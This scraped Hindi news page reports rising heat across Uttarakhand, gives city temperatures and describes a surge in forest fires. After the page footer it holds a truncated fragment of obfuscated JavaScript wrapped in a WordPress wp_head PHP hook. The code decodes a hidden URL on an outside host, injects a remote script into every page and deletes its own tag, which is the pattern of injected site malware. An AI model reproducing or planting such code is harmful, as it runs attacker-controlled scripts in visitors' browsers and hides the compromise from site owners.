Friday, July 19, 2024
Google search engine
Homeमौसमउत्तराखंड में तेजी से चढ़ रहा है मौसम का पारा, पर्वतीय क्षेत्रों...

उत्तराखंड में तेजी से चढ़ रहा है मौसम का पारा, पर्वतीय क्षेत्रों में हो सकती है फौरी राहत

देहरादून: उत्तराखंड में शुष्क मौसम के बीच पारा तेजी से चढ़ रहा है। पहाड़ से लेकर मैदान तक सूरज के तेवर तल्ख हैं, जिससे भीषण गर्मी महसूस की जा रही है। अगले कुछ दिन मैदान में पारा और उछल सकता है। हालांकि, पर्वतीय क्षेत्रों में 15 अप्रैल से फौरी राहत के आसार हैं।

तापमान में दो से चार डिग्री सेल्सियस तक की वृद्धि
मौसम विज्ञान केंद्र के अनुसार, अगले दो दिन ज्यादातर क्षेत्रों में मौसम शुष्क रहने के साथ ही तापमान में दो से चार डिग्री सेल्सियस तक की वृद्धि हो सकती है। जबकि, उत्तरकाशी, चमोली, रुद्रप्रयाग, पिथौरागढ़ और बागेश्वर में वर्षा के आसार हैं। 17 अप्रैल को प्रदेश में कहीं-कहीं गर्जन के साथ बौछारें और आकाशीय बिजली चमकने की चेतावनी जारी की गई है।

दोपहर में घर से बाहर निकलना दूभर
बीते चार दिन के भीतर दून समेत ज्यादातर मैदानी क्षेत्र में तापमान में तीन डिग्री सेल्सियस से अधिक वृद्धि दर्ज की जा चुकी है। चटख धूप खिलने से तपिश बढ़ गई है। खासकर मैदानी क्षेत्रों में दोपहर में घर से बाहर निकलना दूभर होने लगा है। कई जगह गर्म हवा के थपेड़े भी बेहाल कर रहे हैं।

दून में बीते दो दिन से अधिकतम पारा 35 डिग्री सेल्सियस से अधिक बना हुआ है। जो कि सामान्य से तीन डिग्री सेल्सियस अधिक है। मौसम विज्ञान केंद्र के अनुसार फिलहाल मैदानी क्षेत्रों में गर्मी की मार जारी रहने की आशंका है। अगले कुछ दिन तापमान में और वृद्धि होने के आसार हैं। जबकि, पहाड़ों में हल्की वर्षा राहत दे सकती है।

शहर, अधिकतम, न्यूनतम
देहरादून, 35.1, 17.6
ऊधमसिंह नगर, 36.2, 14.4
मुक्तेश्वर, 25.3, 10.5
नई टिहरी, 25.3, 13.1
सड़कों पर चलने वाले लोग पस्त
रुड़की में मौसम का मिजाज गर्म होता जा रहा है। शिक्षानगरी में गुरुवार को दिनभर तीखी धूप खिली रही। वहीं दिन में गर्म हवा भी चली। ऐसे में लोगों को गर्मी का अहसास हुआ। शहर और आसपास के क्षेत्रों में मौसम में काफी बदलाव आ गया है। सुबह से ही तेज धूप खिल रही है। वहीं दिन चढ़ने के साथ-साथ तीखी धूप लोगों को चुभने लगी है। गुरुवार को भी दिनभर आसमान में तेज धूप खिली रही। जबकि दिन के वक्त गर्म हवा भी चली।

ऐसे में सड़कों पर चलने वाले लोग पस्त हो गए। वहीं गर्मी बढ़ने पर घरों एवं दफ्तरों में पंखों की रफ्तार तेज होने लगी है। साथ ही पेय पदार्थों की मांग भी शुरू हो गई है। गुरुवार को शहर का अधिकतम तापमान 37 डिग्री सेल्सियस दर्ज किया गया। जोकि सामान्य से 1.5 डिग्री सेल्सियस अधिक रहा।

जबकि न्यूनतम तापमान 18 डिग्री सेल्सियस रिकार्ड हुआ। भारतीय प्रौद्योगिकी संस्थान रुड़की के जल संसाधन विकास एवं प्रबंधन विभाग में संचालित ग्रामीण कृषि मौसम सेवा परियोजना से मिली जानकारी के अनुसार अगले तीन-चार दिन मौसम साफ रहेगा। ऐसे में तापमान में और बढ़ोतरी का अनुमान है।

आग की चपेट में जंगल, 24 घंटे में 13 और घटनाएं
उत्तराखंड में जंगलों के सुलगने का सिलसिला बढ़ने लगा है। चटख धूप और बढ़ते तापमान के बीच आग की घटनाओं में इजाफा हो रहा है। प्रदेश में 24 घंटे के भीतर 13 नई घटनाएं दर्ज की गईं। जबकि, आग से करीब 14 हेक्टेयर वन क्षेत्र को नुकसान पहुंचा है। इसी के साथ ही फायर सीजन में अब तक कुल 139 घटनाएं हो चुकी हैं, जिनमें 202 हेक्टेयर वन क्षेत्र प्रभावित हुआ है।

वन विभाग की चुनौती लगातार बढ़ती जा रही है। तेजी से बढ़ रहे तापमान और चटख धूप से जंगल की आग का खतरा बढ़ गया है। पर्वतीय क्षेत्रों में बीते कुछ दिनों से लगातार जंगल सुलग रहे हैं। बीते एक दिन में 13 घटनाएं हो चुकी हैं, जबकि, चार दिन के भीतर 30 से अधिक घटनाएं हो चुकी हैं। मुख्य वन सरंक्षक वनाग्नि एवं आपदा प्रबंधन निशांत वर्मा ने बताया कि चुनौती को देखते हुए फायर क्रू स्टेशन पर अतिरिक्त फायर वाचर तैनात किए गए हैं।

प्रभागीय वनाधिकारियों को भी भी नियमित अनुश्रवण और धरातलीय निरीक्षण के निर्देश दिए गए हैं। ग्रामीणों के साथ लगातार बैठक आयोजित कर उन्हें जागरूक किया जा रहा है। साथ ही आग की घटना की जानकारी तत्काल वन विभाग को देने को कहा गया है। भारतीय वन सर्वेक्षण की ओर से मिल रहे फायर अलर्ट का वेरिफिकेशन कर आग को काबू करने का प्रयास किया जा रहा है।

 

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>